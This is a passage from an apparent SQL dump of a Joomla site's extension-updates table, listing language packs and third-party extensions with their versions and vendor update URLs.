Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29755,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29756,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29757,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29758,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29759,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29760,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29761,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29762,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29763,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29764,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29765,3,0,'German CH','','pkg_de-CH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29766,3,0,'German AT','','pkg_de-AT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29767,3,0,'German LI','','pkg_de-LI','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29768,3,0,'German LU','','pkg_de-LU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29769,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29770,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29771,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(29772,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(29773,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(29774,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(29775,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','http://updates.rockettheme.com/joomla/287/cb577720','',''),(29776,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','http://updates.rockettheme.com/joomla/301/dfc993d8','',''),(29777,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(29778,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(29779,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(29780,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(29781,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(29782,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(29783,31,10142,'Regular Labs - Modules Anywhere','','modulesanywhere','plugin','system',0,'7.13.4','','https://download.regularlabs.com/updates.xml?e=modulesanywhere&type=.xml','https://www.regularlabs.com/extensions/modulesanywhere/features',''),(29784,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29785,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29786,57,0,'French','','pkg_fr-FR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29787,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29788,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29789,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29790,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29791,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29792,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29793,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29794,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29795,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29796,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29797,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29798,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29799,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29800,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29801,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29802,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29803,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29804,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29805,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29806,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29807,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29808,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29809,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29810,57,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29811,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29812,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29813,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29814,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29815,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29816,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29817,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29818,57,0,'German DE','','pkg_de-DE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29819,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29820,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29821,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29822,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29823,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29824,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29825,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29826,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29827,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29828,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29829,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29830,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29831,57,0,'German CH','','pkg_de-CH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29832,57,0,'German AT','','pkg_de-AT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29833,57,0,'German LI','','pkg_de-LI','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29834,57,0,'German LU','','pkg_de-LU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29835,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29836,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29838,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'9.0.0','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(29839,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.8','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-8			\n		',''),(29840,129,0,'JCE 2.9.11','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.11','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-11-released',''),(29842,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(29843,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29844,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29845,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29846,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-9.html',''),(29847,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29848,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29849,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29850,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-9.html',''),(29851,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29852,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29853,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29854,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29855,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29856,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-9.html',''),(29857,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29858,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29859,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29860,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','',''),(29861,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.9','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-9.html',''),(29862,1,0,'Joomla','','joomla','file','',0,'3.10.0','','https://update.joomla.org/core/extension.xml','','');
INSERT INTO `fw3gt_updates` VALUES (29863,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29864,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29865,3,0,'French','','pkg_fr-FR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29866,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.0.2','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29867,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29868,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29869,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29870,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29871,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29872,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29873,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29874,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29875,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29876,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29877,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29878,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29879,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29880,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29881,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29882,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29883,3,0,'Persian','','pkg_fa-IR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29884,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29885,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29886,3,0,'Russian','','pkg_ru-RU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29887,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29888,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29889,3,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29890,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29891,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29892,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29893,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29894,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29895,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29896,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29897,3,0,'German DE','','pkg_de-DE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29898,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29899,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29900,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29901,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29902,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29903,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29904,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29905,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(29906,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(29907,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(29908,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(29909,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(29910,3,0,'German CH','','pkg_de-CH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(29911,3,0,'German AT','','pkg_de-AT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(29912,3,0,'German LI','','pkg_de-LI','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(29913,3,0,'German LU','','pkg_de-LU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(29914,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(29915,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(29916,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com:80/joomla/138/b61e70db','',''),(29917,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com:80/joomla/138/2084920890','',''),(29918,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com:80/joomla/286/21ffe006','',''),(29919,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com:80/joomla/286/326466299','',''),(29920,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com:80/joomla/287/cb577720','',''),(29921,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com:80/joomla/301/dfc993d8','',''),(29922,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com:80/joomla/302/2df8a4e2','',''),(29923,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com:80/joomla/313/1985305838','',''),(29924,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com:80/joomla/313/1307741342','',''),(29925,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com:80/joomla/313/1301311221','',''),(29926,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com:80/joomla/381/337128173','',''),(29927,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com:80/joomla/559/1033ef39','',''),(29928,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(29929,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(29930,57,0,'French','','pkg_fr-FR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(29931,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.0.2','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(29932,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(29933,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(29934,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(29935,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(29936,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(29937,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(29938,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(29939,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.28.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(29940,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(29941,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(29942,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(29943,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29944,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(29945,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(29946,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(29947,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(29948,57,0,'Persian','','pkg_fa-IR','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(29949,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(29950,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(29951,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(29952,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(29953,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(29954,57,0,'English US','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(29955,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(29956,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(29957,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(29958,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(29959,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(29960,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(29961,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(29962,57,0,'German DE','','pkg_de-DE','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(29963,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(29964,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(29965,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(29966,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(29967,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(29968,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(29969,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(29970,57,0,'English 